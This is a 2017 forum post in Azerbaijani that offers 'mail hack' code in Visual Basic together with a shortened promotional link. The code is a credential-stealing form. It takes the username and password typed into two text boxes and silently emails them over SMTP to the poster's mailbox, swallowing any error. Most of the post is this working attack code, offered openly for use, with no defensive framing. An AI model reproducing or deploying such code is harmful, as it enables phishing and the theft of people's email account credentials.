GrayWolf Konu tarihi: 9 Kasım 2017 Paylaş Konu tarihi: 9 Kasım 2017 Salam,dostlar,Bu günlərdə aktual olan mail hack mövzusunu qeyd etmək istərdim.Öncədən deyim ki, Visual Basic proqramlaşdırma dilinin məhsuludur. Imports System.Net.MailPublic Class Form1 'By Mammadoff Team / http://bit.ly/2hW9uMA Private Sub Form1_Load(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles MyBase.Load End Sub Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click Dim MyMailMessage As New MailMessage() Try MyMailMessage.From = New MailAddress("Your Mail") MyMailMessage.To.Add("Your Mail") MyMailMessage.Subject = "Log info" MyMailMessage.Body = "Name: " & TextBox1.Text & " / Pass: " & TextBox2.Text Dim SMTP As New SmtpClient("smtp.mail.com") SMTP.Port = 587 SMTP.EnableSsl = True SMTP.Credentials = New System.Net.NetworkCredential("Your Mail", "Your Password") SMTP.Send(MyMailMessage) Catch ex As Exception End Try End SubEnd Class Kod budur.http://bit.ly/2hW9uMA saytına daxil olsanız sevinərəm. Alıntı Link to comment Share on other sites More sharing options...
Recommended Posts
Sohbete katıl
Şimdi mesajını gönderebilir ve daha sonra kayıt olabilirsin. Bir hesabın varsa, hesabınla göndermek için şimdi oturum aç.